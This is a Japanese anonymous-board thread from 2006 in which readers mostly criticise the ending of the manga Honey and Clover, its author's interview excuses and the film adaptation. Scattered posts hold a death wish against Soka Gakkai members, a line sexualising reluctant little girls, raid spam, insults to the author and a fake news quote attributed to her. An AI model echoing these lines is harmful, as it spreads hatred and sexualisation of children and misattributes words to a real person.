
・はぐの話は最初から決まってた。
すごくつらい話になるから、読者もつらくなるだろうと思い、ものすごい勢いで飛ばして描いた。

・はぐの話を進める上で森田の生い立ちは避けて通れず、どうしようもなくすれ違う二人を描きたかった。

・はぐの様に道を決めた子は読者から共感されにくいが、
モノを作ってる人には分かってもらえるといいなと思って描いていた。

・YUKIと平野(アニメのOPのディレクター)「辛い時に傍にいる人に頼ってしまうのは共感できる」との話を聞いて、
海羽野「次号(多分ラスト)描くべき事が分かった」と。

750 :花と名無しさん:2006/08/14(月) 23:52:09 ID:???0
修の物語でもあるならもっとはぐへの感情も丁寧に描いておけよ…
多くのファンは別に修が青春スーツ再装着して参戦したことより
スーツ着るまでの葛藤とか気持ちという過程のなさにポカーンとしてるんだから

脳内でどんな修物語が生まれていたのか知らないけど
それをきちんと原稿に描いてくれたら最後までハチロクファンでいられたよ…

751 :花と名無しさん:2006/08/14(月) 23:55:00 ID:???0
>>748
多分だけど、
・自分の腕をかむ→臭の腕をかむを1ヶ月
・父現る&再婚→ガーン!!を1ヶ月
みたいに山田の恋愛みたいに心の動き(と言っても落ち込むだけ)を時間かけて書かずに
まとめてドンと書いたってことじゃないかな?

でも、ここを丁寧に書かないと臭に頼ってしまうことが理解不能に……
ハチクロはマンガなのに、膿野は電波とか対談とかで言い訳とかするよね、やめてほしい

>>750
脳内臭物語ワロタ
そうだよな、膿の頭の中と照合しないとわかんねえよな、10巻の内容……

752 :花と名無しさん:2006/08/15(火) 00:34:31 ID:???O
モノを作ってそれで生活してるけど共感出来ねー!!
はぐは厳しい選択をした、と言われても甘えているようにしか見えない
一番甘えてるのは、描写不足を棚に上げて別メディアで解説している作者自身だけど

753 :花と名無しさん:2006/08/15(火) 00:57:50 ID:???0
友人に9巻を貸した。読後開口一番、
「ねえ、この前の巻、多分借りてないんだけど」
「貸したよ8巻」
「いや読んでない。いきなりはぐと修がこんなんなっててわけわからないもん」
友よ、その空白の1巻ぶんとやらは作者の脳内にしかないのだよ・・・

つーか山田のウジウジと竹本の自転車少年物語より、
修(とはぐ)の心の葛藤の方にこそ時間を割くべきなんじゃないのかねぇ

754 :花と名無しさん:2006/08/15(火) 01:04:34 ID:???0
いや、竹本の自転車少年物語は、ハチクロの中でも白眉のできだ。
竹本がだんだん主婦になっていくところが面白かった。

755 :花と名無しさん:2006/08/15(火) 01:14:39 ID:???0
むしろはぐ臭がいらんエピソード

756 :花と名無しさん:2006/08/15(火) 01:21:18 ID:???0
いや、ハチクロ自体に自転車少年よりはぐ修が必要とかってんじゃなく、
ああいう話の展開にするならもっと時間配分考えりゃいいのに、と。
まあそしたらさらにクソクソな話になりそうだけど

757 :花と名無しさん:2006/08/15(火) 01:26:34 ID:ryKaALBrO
今日一気に全部読んだ。
なんっつーか、ここまで人気になった理由が分からん。
確かに面白いし、テンポも良いが、大人気になる程のモノじゃない感じ。ありふれた漫画だと思う。

758 :花と名無しさん:2006/08/15(火) 01:28:38 ID:???0
>>753は8巻の次に9巻じゃなくて最終話を見せてあげたほうが良かったと思うよ。
正直そっちのほうが違和感無いし。

修→はぐの説明はモノローグでもいいからちゃんと描いて欲しかったな。
できないならできないなりの描き方とか。

「人は、圧倒的な才能が近くにある時、どこか別の存在として距離を置いてしまう。
でも俺は吸い寄せられてしまうんだ、どこまでも近い位置で見ていたい。原田やリカ、はぐ・・・
でもその気持が、いつから他の感情も混ざったかなんてのは説明して言葉にしたら別の何かにかわってしまいそうで」
みたいなポエムの一つでもあれば良かったのに。

759 :花と名無しさん:2006/08/15(火) 01:46:41 ID:???0
自分750なんだがハチロクじゃなくてハチクロだった
よくある間違いだけど車漫画も好きだからこりゃ無意識だな
そういやあっちも今ではツマンナイ漫画になってるや

760 :流れをみずに書くけど:2006/08/15(火) 01:53:30 ID:???0
今号のコーラス買ったけど確かに最終回になってた。
でも表紙にも目次にも最終回の文字が入ってないんだよね。
普通は「感動の最終回!」とか煽るよね?
これはなんだろ?
チカ先生が編集部の意向を無視して強制終了させたってことですかね?

761 :花と名無しさん:2006/08/15(火) 01:54:45 ID:???0
>750
そうなんだよね、あまりに唐突すぎる。


762 :花と名無しさん:2006/08/15(火) 01:59:31 ID:???0
漏れの地元の映画館じゃハチクロは今週一杯、早くも打ち切りか?
しかも今週はレイトショーの一日一回のみ。
公開週は一日4回上映だったのに・・・。

まぁ面白くなさそうだしな(w。

763 :花と名無しさん:2006/08/15(火) 02:15:02 ID:X9/LrCjd0
えっ!?最終回ってどうなったんですか!?
特に森田とはぐ

764 :花と名無しさん:2006/08/15(火) 02:19:44 ID:???O
臭はぐなんていらねぇよ、夏

765 :花と名無しさん:2006/08/15(火) 02:24:33 ID:???0
>>749
・森田派や竹派から困惑の電話殺到。


その電話、森田派竹本派だけからだったのかな?
ここでは修ファンの阿鼻叫喚も凄かったのに。

766 :花と名無しさん:2006/08/15(火) 02:25:03 ID:???O
>・森田派や竹派から困惑の電話殺到。
ここにきた熱狂的な信者と同じように、
ウミノも不満を持ってるのがカプ厨だけと思ってるんだ

767 :花と名無しさん:2006/08/15(火) 02:27:45 ID:???O
修の大好きだーは燃え尽きたよウミノタン…
森田竹派でもなく修信者だった
好きだったものが全然別のものに変わっていくのって何より辛い

768 :花と名無しさん:2006/08/15(火) 02:29:59 ID:???O
>>752
ハゲド

769 :花と名無しさん:2006/08/15(火) 02:56:22 ID:???0
正直、映画の方が好感持てた。
でも最終回はハチクロっぽく終わってくれて少しホッとした。

770 :花と名無しさん:2006/08/15(火) 03:03:45 ID:???0
苦情=人気の証拠と思ってるかもね。
こんなに愛されてるんだと分かって、かえって嬉しいんじゃない作者にとっては。

771 :花と名無しさん:2006/08/15(火) 04:46:38 ID:???0
YUKIのFC会報なんて、誰もが読めるものじゃないよね?
そこであんな言い訳めいた事言われても…
ちょっとこの人は誌外で語る場所を与えられ過ぎちゃってる気がする
そんなだから、本来は作家にとって唯一の表現場であるはずの作品がスカスカなんじゃないの?

772 :花と名無しさん:2006/08/15(火) 05:39:20 ID:???O
そこでパート2ですよ。




嘘だけど。

773 :花と名無しさん:2006/08/15(火) 05:42:40 ID:???0
ハチクロって
8巻あたりでなんかしらの事情でぷっつり話が切れてたら
(たとえば羽海野さん失踪とかそれこそ右手ケガとか
 掲載誌がつぶれた上に拾ってくれるとこがないとか)
伝説の漫画になってたと思う。
もったいないね

774 :花と名無しさん:2006/08/15(火) 06:54:12 ID:???O
映画見てきたけど…正直、あのキャラは私には修の中の人にまで萌えられる様なキャラじゃなかったわ。
役者さん本人は素敵だと思うけど、アレで何故作者が萌えてしまったのか理解に苦しむわ。


775 :花と名無しさん:2006/08/15(火) 07:06:43 ID:???0
あえて弁証法的手法をとらず、スーパーフラットな世界を演出したウミノ先生☆
これでハチクロは単なる少女漫画から現代美術へと昇華したわけですね!
感動しました!!言いたい人には言わせておけばいいんです!
これは紛れもなく漫画史上に残る「名作」です!

776 :花と名無しさん:2006/08/15(火) 07:46:35 ID:???O
修は好きだが堺はキモすぎて理解できい


777 :花と名無しさん:2006/08/15(火) 07:51:24 ID:???O
>>753
>いきなりはぐと修がこんなんなってて


9巻の時点じゃ まだ保護者で
そんな感想になるとは思えないんだが・・・・・・・ネタですかw

778 :花と名無しさん:2006/08/15(火) 09:47:08 ID:???0
>>774
本当は堺が演じる修に萌えたんじゃなくて
素の堺に萌えた結果堺が演じた修にテコ入れする気になったんじゃないのかなと予想
もともと作者は修のことは好きだったとは思うけどね

779 :花と名無しさん:2006/08/15(火) 10:03:33 ID:???O
作者が=自分=はぐだと思おうとしたのがそもそもの間違いのような気がする
親が子供犯すようなもんでさあ、それはNGなんじゃ
何か芸術の神様かなり怒ってないか?
本気の森田を敵にまわすとこうなるって感じで
最近のハチクロに関する不幸ちょっと怖いよ
いやマジで気をつけた方がいいよ

780 :花と名無しさん:2006/08/15(火) 10:08:43 ID:???0
>>779
ハチクロがはあ?なのは同意だが、
それは言い過ぎ。
というか災難にあった人に悪いよ。
だいたい芸術の神様って……ハチクロなんか気にかけるかよ

781 :花と名無しさん:2006/08/15(火) 10:12:34 ID:???0
779はいつもの携帯チャソでしょ

782 :花と名無しさん:2006/08/15(火) 10:14:29 ID:???0
>>779
消費社会・情報社会の段階に達した資本主義
のニヒリズムの徹底した先駆的表現がハチクロ
の本質だろうね


783 :花と名無しさん:2006/08/15(火) 10:22:07 ID:???0
>>782
中卒のおれに解かる言葉で頼む。

784 :花と名無しさん:2006/08/15(火) 10:27:31 ID:???O
でも洒落になんない事が起きちゃったんだよ
起きちゃってからじゃ遅いから嫌な予感がした時に
必死に叫んだんだけど
竹本が止めたみたいじゃんか、はぐちゃんが苦しむから、これから先はいらないって
そういう事は本当にあるんだよ
気をつけなきゃもっとヤバいよ
壊したら大変な事になる均衡ってあるんだよマジで

785 :花と名無しさん:2006/08/15(火) 10:37:01 ID:???0
>>783
日本のポストモダン文化においては、超越的な価値を奉ずる老人も、
価値を内面化した主体としての大人もおらず、ただ相対的なゲーム
に狂奔する子供たちがいるだけだ、そして、資本主義が幼児化を伴
うとすれば、そのような日本の子供のポストモダニズムこそ世界の未
来を先取りするものだということになるだろう。そのアイロニーとして
ウミノはハチクロを描いたんだろう、ということだ。だからハチクロは
既にアートだと結論付けたい。

786 :花と名無しさん:2006/08/15(火) 10:38:09 ID:???0
浅田彰乙

787 :花と名無しさん:2006/08/15(火) 10:38:41 ID:???0
スーパーフラット万歳!!!!

788 :花と名無しさん:2006/08/15(火) 10:38:59 ID:???O
>>781
アホだろ

789 :花と名無しさん:2006/08/15(火) 10:40:02 ID:???0
わかる人にしかわからないネタはやめましょう

790 :花と名無しさん:2006/08/15(火) 10:47:17 ID:???0
人生という暗闇の中で、唯一の光がハチクロでした。
ウミノさんのおかげでしょうか、最近生きる気力を完全に失いました。
皆さんさようなら。


791 :花と名無しさん:2006/08/15(火) 11:15:24 ID:???0
なんか痛い子が来てるみたいだね
しかも一人じゃないっぽいw

792 :花と名無しさん:2006/08/15(火) 11:17:48 ID:iUjUy1s+0
キンマンコですよ!!

793 :花と名無しさん:2006/08/15(火) 11:24:20 ID:???O
しばらく見ない内にどうしたのこのスレ

794 :花と名無しさん:2006/08/15(火) 11:24:52 ID:iUjUy1s+0
すごい時代に入りました、ね! 
そのうちデェジン(大臣)も、何人か出るでしょう。
もうじきです、明日あたり出るから。
みんな、皆さん方の部下だから、そのつもりで。日本一の創価学会ですよ。

795 :花と名無しさん:2006/08/15(火) 11:26:19 ID:???0
>>792
糸満平和会館て、これ名前変えた方がいいんじゃないかな。
……ウーマンっぽい、ウーマンっぽい。
糸満なんてウーマンっぽい(※会場はあまりウケない)……駄目か。
もっといいね、いいのは、キンマン、いや、イトマン、キンマンコだよ!

796 :花と名無しさん:2006/08/15(火) 11:35:03 ID:???0
なんか妙な感じになってきたな、このスレ……w

797 :花と名無しさん:2006/08/15(火) 11:42:33 ID:???0
ワロス

798 :花と名無しさん:2006/08/15(火) 11:45:24 ID:???0
ん?ん?ん?

799 :花と名無しさん:2006/08/15(火) 11:47:28 ID:iUjUy1s+0
私の話が高尚で、そしてわかりやすく、そいで哲学的で、そいで文学調で、詩的で、そいで会話的である。
頭がそうとう聡明でないと追っついていけないんです。そいで、行き詰まったところでコーラスやって、
皆なでウップン晴らしをすると。それが、芸術的、SGIの本当の仏法の行き方なんです。その反対が日顕
の行き方なんです。

800 :花と名無しさん:2006/08/15(火) 11:50:52 ID:iUjUy1s+0
このあいだ、オバサン、オバサンジョだ。
二つ字を加えなきゃオバサンだったが、男だったんですよ
(※ナイジェリアのオバサンジョ元国家元首のこと)。
アフリカ全体の中心的人物だ。じつを言えば頭がいいんです、なかなかねェ。
アフリカっていうと、少しねェ、黒くてねェ。そう、そんなもんじゃない、先入観がよくない。
一番バカなのは日顕(上人)!

801 :花と名無しさん:2006/08/15(火) 11:55:04 ID:iUjUy1s+0
信心の二字の中にしか、本尊はないんです。本門戒壇・板御本尊、なんだ! 
寛尊は「信心の中にしか本尊はない」と。ただの物です!

802 :花と名無しさん:2006/08/15(火) 11:56:16 ID:???0
・・・・・・・・・・・・

803 :花と名無しさん:2006/08/15(火) 11:59:47 ID:9dLj3d7OO
ア法華講散れ!

804 :花と名無しさん:2006/08/15(火) 12:02:55 ID:S/XZ3+sRO
VIPから来ますた

805 :花と名無しさん:2006/08/15(火) 12:11:00 ID:???O
このスレは完全に駄目になった

806 :花と名無しさん:2006/08/15(火) 12:11:52 ID:???0
スプリット

807 :花と名無しさん:2006/08/15(火) 12:13:36 ID:???0
>>803-805
携帯厨m9(^Д^)プギャー!!

808 :花と名無しさん:2006/08/15(火) 12:16:37 ID:???0
よーし、パパROMっちゃうぞ〜?

809 :VIPからきますた:2006/08/15(火) 12:17:30 ID:???0
VIPからきますた

810 :花と名無しさん:2006/08/15(火) 12:17:51 ID:???O
サゲマン、ウミノタン
ことごとく雑誌を潰していく女

811 :花と名無しさん:2006/08/15(火) 12:18:43 ID:???0
スレも潰れますた

812 :花と名無しさん:2006/08/15(火) 12:19:30 ID:???0
>>810
m9(^Д^)プギャー!!

813 :花と名無しさん:2006/08/15(火) 12:22:35 ID:???0
VIPから来ますた

814 :花と名無しさん:2006/08/15(火) 12:39:35 ID:???0
どーでもいーや

815 :花と名無しさん:2006/08/15(火) 12:40:18 ID:???O
竹本オタの自分としては
森田が一番なにもしてないから
はぐとくっつかないで良かったよ

816 :花と名無しさん:2006/08/15(火) 12:42:43 ID:???0
>>779
悲しげな電波ポエムに捕り憑かれてしまったのだろうか
言葉に呪縛される呪術を言霊と言う

817 :花と名無しさん:2006/08/15(火) 12:45:13 ID:???0
「なにもしない」のが、しゅうだったのにね・・・
いつのまに青春スーツを着てたのかさっぱり理解できない

818 :花と名無しさん:2006/08/15(火) 12:46:47 ID:???0
臭くっさい〜

819 :うんこ:2006/08/15(火) 13:01:47 ID:aDpsuCSS0
創価学会員がいると聞いてVIPからきました^^


学会員はきめぇから全員死ねwwwwwwwwww

820 :花と名無しさん:2006/08/15(火) 13:02:30 ID:???0
それってギンガムファッツの事?

821 :花と名無しさん:2006/08/15(火) 13:06:23 ID:???0
自重しなくていい

822 :花と名無しさん:2006/08/15(火) 13:08:23 ID:???0
嫌がる幼女ハァハァ

823 :花と名無しさん:2006/08/15(火) 13:14:55 ID:???0
あおおー!

824 :花と名無しさん:2006/08/15(火) 13:21:58 ID:???0
ハッハ・・・・・ハッ・・・・・・・ハアハアハアハア
あ・・・・あー!

825 :花と名無しさん:2006/08/15(火) 15:12:14 ID:OhqAj/75O
VIPからきました
文句しか言えない腐女子の巣はここ?

826 :花と名無しさん:2006/08/15(火) 15:21:05 ID:???0
ちょwww腐女子かどうかはともかく普通は女ばっかだろwww
少女漫画板が男の巣窟だったらそっちの方がキモスwww

827 :花と名無しさん:2006/08/15(火) 16:03:40 ID:???0
信者がVIPに張ったのかな
人も少なくなったからこんなことしても虚しいだけだと思うんだが

828 :花と名無しさん:2006/08/15(火) 16:56:30 ID:???0
>>804
>>809
>>813
>>819
>>825
ねぃねぃキミたちぃ〜アンチスレにおいでよ〜
http://comic6.2ch.net/test/read.cgi/csaloon/1146626902/

829 :花と名無しさん:2006/08/15(火) 17:06:19 ID:???0
>>827
信者ってのとはなんか違う気がする。
本物の信者なら作品のヘボい部分も含めてまるっと愛してるわけだし、
周囲にダメ出しされる部分も何となくわかっている上で、
敢えてファンを続けているもんじゃないのかと。

とりあえず向こうに貼った奴は信者やファンを名乗る資格すらないのは確かだが。

830 :花と名無しさん:2006/08/15(火) 17:40:52 ID:???O
 やっと最終回を親戚ん家でみた
やっぱ森田とはぐはいずれ再開して2人が一緒になるなと思った。竹本は可哀想だが(それでも就職決まったからOKかなぁと)でもなんか切ない
 山田には少しガッカリ。最後くらい真山をフッキッて泣かないでほしかった・・・・
それより誰か説明してほしいのが
竹本とはぐの自転車での会話 まったくわからん。どゆことですか?
先生は結局 捨てゴマ?はぐにとって重みになってんの?
わけわからん

831 :花と名無しさん:2006/08/15(火) 18:02:09 ID:???O
10巻て九月に発売なんだよね?
じゃあ番外編はコミックスに収録されないまま?

832 :花と名無しさん:2006/08/15(火) 18:23:26 ID:???0
結局作者が勝手に終わらせちゃったっぽいよなぁ。表紙も最終回とか一切書いてないし。
あのストーリーで終わらせたかったのかもしれないけど、スピンドルバージョン乞うご期待とか付け加えてるし。

昔本宮ひろしかなんかの漫画で、辞める辞めないで編集部ともめて、作者が強引に最後のコマに
「完」って入れたけど、編集部サイドが本にする際に一文字付け加えて「未完」になってたっていうエピソード思い出した。

833 :花と名無しさん:2006/08/15(火) 18:30:36 ID:???0
>>832
スピンドルじゃなくてスピンオフじゃないの?
スピンドルだとライブアライブの技だよ。

本宮ひろしの例も逆。
打ち切りが悔しくて「未完」って入れたんだよ。

834 :花と名無しさん:2006/08/15(火) 19:39:09 ID:???O
>>299
2巻の森田のセリフより

ハーイ☆
ボク忍☆
君は?




これには吹いた

最終回の真山についての話題ないな。やはり、嫌いな椰子多いからか?

835 :花と名無しさん:2006/08/15(火) 19:41:35 ID:rJe6Rj/KO
すまん、上に補足


髪は短めではない模様

836 :花と名無しさん:2006/08/15(火) 19:45:45 ID:???0
誰の髪?

837 :花と名無しさん:2006/08/15(火) 20:17:08 ID:???O
>>836
ヒント>タケノコは森田に髪を千円で切っ(切られ?)てもらった

838 :花と名無しさん:2006/08/15(火) 20:31:11 ID:???0
>>836
d!そういうことか

839 :花と名無しさん:2006/08/15(火) 20:38:14 ID:???0
>>832
車田正美が「男坂」だかが打ち切りになったので
コミックスにする際に、自分では納得してないので「未完」っていれたんじゃなかったっけ?

840 :花と名無しさん:2006/08/15(火) 21:24:24 ID:???0
jhsdaq2dgh9.hp.infoseek.co.jp/zassi_musume/bub_kamenasi031031.jpg




841 :花と名無しさん:2006/08/15(火) 21:36:14 ID:O9RILA2Z0
こんなこと聞くの遅れてるかもしれませんが・・・・
ハチクロクリーナーってもう売ってないのでしょうか?
ちなみに2ではなく、去年の9月頃発売されたものなんですが・・・
まだどこかのガチャガチャで売ってたりしないですかねぇ?
今更欲しくて欲しくてどうしようもなくなってしまいました。

842 :花と名無しさん:2006/08/15(火) 21:39:41 ID:???0
なんかスレが色々流れてるのでもういっかい
YUKIとウミノ☆さんの対談結果貼っときますね。
次スレのテンプレにも入れましょう。
*************************************************
・森田派や竹派から困惑の電話殺到。
 〜〜〜 〜〜
「署名集めたら結末は変わるのか?」との質問も。

・ハチクロは修の物語でもある。
      〜〜〜〜〜〜〜
「傍観者」だと思おうとしていたが、みんなと同じになって飛び込む事で、 大好きだー、と言える様になった。
〜〜〜〜〜〜〜〜〜〜〜〜〜〜     

・はぐの話は最初から決まってた。 すごくつらい話になるから、
読者もつらくなるだろうと思い、ものすごい勢いで飛ばして描いた。
〜〜〜〜〜〜〜〜〜〜〜〜          

・はぐの話を進める上で森田の生い立ちは避けて通れず、どうしようもなくすれ違う二人を描きたかった。
〜〜〜〜〜〜〜〜〜〜

・はぐの様に道を決めた子は読者から共感されにくいが、
        〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
モノを作ってる人には分かってもらえるといいなと思って描いていた。


・YUKIと平野(アニメのOPのディレクター)「辛い時に傍にいる人に頼ってしまうのは共感できる」との話を聞いて
〜〜〜〜〜〜〜〜〜〜〜〜〜〜                                  〜〜〜〜〜〜
海羽野「次号(多分ラスト)描くべき事が分かった」と。
              〜〜〜〜〜〜〜〜〜


843 :花と名無しさん:2006/08/15(火) 21:41:50 ID:???0
>>841
今、ヤフオクに出てる奴ではいかんのか?

844 :花と名無しさん:2006/08/15(火) 21:56:57 ID:???0
>>842
>・はぐの様に道を決めた子は読者から共感されにくいが、
>        〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
>モノを作ってる人には分かってもらえるといいなと思って描いていた。

これなんかすごく読者をバカにしてる&言い訳臭い書き方

845 :花と名無しさん:2006/08/15(火) 22:09:52 ID:???0
もしかして山田のグズグズっぷりは読者に共感を得られると思って・・・?

はぐの道の決定自体はむしろ進路を悩んだりする年齢からしたら共感される部分だと思うんだけどな。
むしろそれ以前の何考えてるかわかんない子の頃の方が共感し辛いし。
問題は修・はぐ周りを丁寧に描かなかったことなのになー。

846 :花と名無しさん:2006/08/15(火) 22:10:31 ID:???0
はぐみ(=作者)の気持ちは多分一部の人しか分かってくれないだろうから
理解力のない人はさようならって意味だな

847 :花と名無しさん:2006/08/15(火) 22:28:13 ID:???0
>>830
コミック派だから来月に10巻読まないとキャラの表情とか詳しいセリフなんかは
わからないけど以前のスレやネタバレを読む限りは前向きになってる様子なんじゃないかと思う。
あと「返さないといけない」も好きだからこその発言だと思った。
これは個人的な意見だけど。
あと、なんだかんだいってもはぐが選んだのは修だから森田に心変わりするという可能性はないと思う。
修が死ぬ直前に森田にはぐを託すというのならありだと思うけど。

848 :花と名無しさん:2006/08/15(火) 22:28:23 ID:???0
別にそこだけ切り取った様に生々しくしなくてもねぇ
バランスが悪いよ

849 :花と名無しさん:2006/08/15(火) 22:31:13 ID:???0
そうかなぁ。なんか、心ではきっとはぐと森田は深い部分で
一生繋がっていくんだと思うんだけど。

850 :花と名無しさん:2006/08/15(火) 22:43:11 ID:???0
>>842
〜〜〜 はいらんよ。読みづらい。

851 :花と名無しさん:2006/08/15(火) 22:49:01 ID:???0
>>842
>読者もつらくなるだろうと思い、ものすごい勢いで飛ばして描いた。
 〜〜〜〜〜〜〜〜〜〜〜〜          

工エエェェ(´д`)ェェエエ工
端折ったのは読者の為なんてよく言える
肝心な部分を省略して飛ばしたもの読まされた方がよけい辛い

852 :花と名無しさん:2006/08/15(火) 22:51:18 ID:???0
>>849
一生繋がってると思うよ。
「すっと見てるから」と言ってるし。

森田=同志としての繋がり
修 =夫婦としての繋がり(数年後とか結婚してそうだし)
竹本・山田・真山=友情としての繋がり
な感じがする。

853 :花と名無しさん:2006/08/15(火) 22:53:12 ID:???O
>>847じゃあさ はぐはなんで泣いたの?

854 :花と名無しさん:2006/08/15(火) 22:54:19 ID:???0
>>842
てか、最後の行の海羽野を羽海野に直さないと

855 :花と名無しさん:2006/08/15(火) 22:57:32 ID:???0
はぐと修の方が戦友みたく一生を添い遂げるんじゃないかな?

856 :花と名無しさん:2006/08/15(火) 23:04:44 ID:???0
>>853
実際どんな泣き方なのか見てないからハッキリとは言えないけど
泣いててもおかしくないんじゃない?
羽海野さんが読者を感動させるために演出上泣かせたのかもしれないし、
たいして深い意味はないと思う。


857 :花と名無しさん:2006/08/15(火) 23:09:06 ID:???O
>>856
そっか・・・・まぁ はぐだもんな
その辺は自分で理解するしかないか
なんつうか どう見ても
不幸にしか見えん 先生が

858 :花と名無しさん:2006/08/15(火) 23:11:45 ID:???0
>>856
言えてる
竹本にはぐを付き添わせる修とか
竹本に修のことを話すはぐとか
深く考えてたら描けないとオモ

はぐマンセーの為に周りが動く世界

859 :花と名無しさん:2006/08/15(火) 23:12:48 ID:???0
はぐと修はパートナーというよりも教祖と信者って関係に近いようなきがする。

と思ったがこの漫画のヒロインって全員そうだった。orz

860 :花と名無しさん:2006/08/15(火) 23:15:48 ID:???0
ハッΣ(゚д゚lll)
人生よこせー金よこせーって展開なのはそういうイミかー!w

861 :花と名無しさん:2006/08/15(火) 23:19:02 ID:???0
人のいい竹本は危うく引っ掛かりそうになったが
はぐ教から何とか回避できてよかったな

862 :花と名無しさん:2006/08/15(火) 23:33:27 ID:???0
たけのこはちゃんと失恋した自分を見つめられたから、はぐ教脱出。
天才じゃない自分にふさわしい仕事も見つけた。
臭は原田リカ教にはまって、教祖の死があったものの脱出できず。
新たな教祖を見つけただけでした。

863 :花と名無しさん:2006/08/15(火) 23:42:59 ID:???0
>>844
だね。
普通の読者は理解できないだろうが
物を作ってる読者なら理解できる…って。

普通の一般の読者をバカにしてる。

物を作ってる読者にだけに読ませたいんなら
普通の読者がいなくて
自分でも漫画や小説を描いてるような読者が多い場(同人)だけで
売ってればいいのに。

864 :花と名無しさん:2006/08/15(火) 23:52:13 ID:???0
>>842みたいな言い訳で、いままでずっと読んできた読者を
納得させられると思ってんのか、羽海野タン・・・。
すっ飛ばさずに、丁寧に書けよ!!

865 :花と名無しさん:2006/08/16(水) 00:19:24 ID:???0
9巻でいきなりはぐが「修☆ラブ」になってて
「この期に及んで片思いレースにこの組み合わせが出てくんのかよ!」と思ってたんだが
このスレのバレで「好きさ大好きさ発言」を知って鼻水吹きそうになった。
言うなればガラかめで紅天女の役者候補に突然速水真澄が入るのと同じくらい
脈絡伏線なしだと思った。
白目で「羽海野・・・おそろしい子!あの子は天災よ!!」と言いたかった。

866 :花と名無しさん:2006/08/16(水) 00:26:27 ID:???0
ところで傍観者だと思おうとしていた修なんて出てきた?
青春スーツを身につけたいのを我慢してたってこと?
はぐとの恋愛を我慢していたかのようなニュアンスがキモ過ぎ

867 :花と名無しさん:2006/08/16(水) 00:53:57 ID:???0
>>866

>>842のことだよね?
もしかしたら*羽海野さんが*傍観者だと思おうとしていた
ってことなのかなと思った。

868 :花と名無しさん:2006/08/16(水) 00:58:54 ID:???0
>・はぐの話は最初から決まってた。 すごくつらい話になるから、
>読者もつらくなるだろうと思い、ものすごい勢いで飛ばして描いた。

こういうところこそ、丁寧に描くべきなのに…。
ひどいな…。

コーラスのアンケートにハガキ出してきたけど
ハチクロの苦情(ファンだけど、はぐがケガしてからの展開は
ひどすぎると思う)を書いたよ。
良かった漫画は「サムライカアサン」や「満腹児」にしてきた。
コーラス、ハチクロはずっと酷いし
プライドは作者がカルト宗教の信者だし
それ以外は、読んでも読まなくてもいいような内容のがほとんどだし
消去法で誉められるのったらサムライカアサン系しかないじゃん。


869 :花と名無しさん:2006/08/16(水) 01:32:12 ID:???0
>>867
あ、そっか
描けるようになったじゃなくて、言えるようになったってあるから
てっきり修のことだと思って(照れ

870 :花と名無しさん:2006/08/16(水) 02:31:47 ID:???0
>>865
>ガラかめで紅天女の役者候補に突然速水真澄が入るのと同じくらい
>脈絡伏線なしだと思った

真澄タンが紅天女になるのを想像しちゃっただw

871 :花と名無しさん:2006/08/16(水) 02:48:17 ID:???O
森田って母親いる?
子供の頃の回想でもでてこなかったし

872 :花と名無しさん:2006/08/16(水) 04:26:05 ID:???O
>>871
たばこ屋のりっちゃんが森田のお母さん。(名前うろ覚え)

873 :花と名無しさん:2006/08/16(水) 04:37:46 ID:???0
つい最近1巻からまとめて読んだんだけど、真山と自分が妙にリンクしてる部分が多くてびっくりした(・ω・;)

オレも、ありがたいことにこんなオレのこと好きになってくれた子がいたんだけど、いろいろあってその子の告白断り続けちゃったんだよね。
で、時間がたっていざその子が他の男と仲良くなり始めると、なんかイライラっていうか、モヤモヤしちゃってorz
相手の男のこといろいろ聞いて、ついイチャモンつけちゃったりさ^^;

ついでにクセ毛&メガネなんでこれはもう真山カットにするしか?w

874 :花と名無しさん:2006/08/16(水) 05:36:41 ID:???0
振り向けば 心の隅に君がいて
I want smiling your face いつもそれだけで
投げやりな気持ちが空に消えてくよ
でも“愛してる”とは違ってる
ちっぽけなプライドも遠慮もいらない
束縛やヤキモチはちょっぴりあるけど
燃えるよな恋じゃなく ときめきでもない
でもいいじゃない
それもまた一つの Love・・・Love・・・Love・・・

875 :花と名無しさん:2006/08/16(水) 05:37:44 ID:???0
( ;∀;)イイハナシダナー

876 :花と名無しさん:2006/08/16(水) 06:00:28 ID:???O
修×リカ、真山失恋でもよかったよ。
とにかく修×はぐは近親相姦&ロリで気持ち悪い・・・
法律上は問題ないとしても、幼少の頃から面倒みてる子に恋心は芽生えんだろう普通。

877 :花と名無しさん:2006/08/16(水) 07:48:25 ID:???O
>>876
恋はSEXつうこと?


878 :花と名無しさん:2006/08/16(水) 08:05:13 ID:???O
やるやらん別にしても変態の香りが漂う

879 :花と名無しさん:2006/08/16(水) 08:11:47 ID:KrERNXNb0
はぐ竹本
修里香
山田真山

880 :花と名無しさん:2006/08/16(水) 09:54:20 ID:???O
真山がはぐを好きになってしまうなら変態とか思うが(高橋しんのイラストでなぜか真山×はぐになってたが・・・おぇ)
修ならエロの香りしないから許せるぉ(^ω^)

881 :花と名無しさん:2006/08/16(水) 10:46:38 ID:dIakGQvZO
田森〜田森〜魔法使い〜田森〜

882 :花と名無しさん:2006/08/16(水) 11:10:20 ID:???0
映画見てきました。
いや〜最悪だねぇ・・・
原作通りじゃないから最悪なんじゃなくて、
1本の映画として最悪。

いろんな話をごっちゃまぜにして、
全体的に薄〜く仕上げましたって感じ。
ビジュアル過多、感情無視。

せっかく設定変更するなら、
もっと上手くやればいいのにさぁ。

いや〜最悪最悪。
観た後は、ものすっごい嫌悪感が残りました。

それにしても、
「博士が愛した〜」にしても「ハチクロ映画」にしても、
アスミックって、最悪な映画会社だね。
こんなの作るんだったら、映画化するなよ!

スレ違いすまんm(_ _)m

883 :花と名無しさん:2006/08/16(水) 11:44:05 ID:???0
ドラマ化にでもなったら修のはぐ溺愛も多少抑え目になりそう

884 :花と名無しさん:2006/08/16(水) 11:54:04 ID:???0
ところでウミノタン曰くの「モノを作ってる人」は
実際あの展開は理解出来たんでしょうか?
このスレにも結構いそうだけどな

885 :花と名無しさん:2006/08/16(水) 12:26:10 ID:???0
羽海野チカが10日、自身のハチクロに関する連日の叩きに「ネラーも、少しは目を覚ましてもらわないと」と激怒した。
批判を繰り返す2chの論調に不満を示した上で「修にかかわらず、誰とくっつけても批判するんでしょ。誰とくっつけ
ても同じ」と吐き捨てるなど、怒りの炎は収まらなかった。

886 :花と名無しさん:2006/08/16(水) 12:28:02 ID:???0
>>882
映画が糞だと言うんならまず9巻以降の原作を読んでみろ
便所紙レベルの糞が拝めるぞ

887 :花と名無しさん:2006/08/16(水) 13:55:37 ID:???O
>>886
・・・・・・・

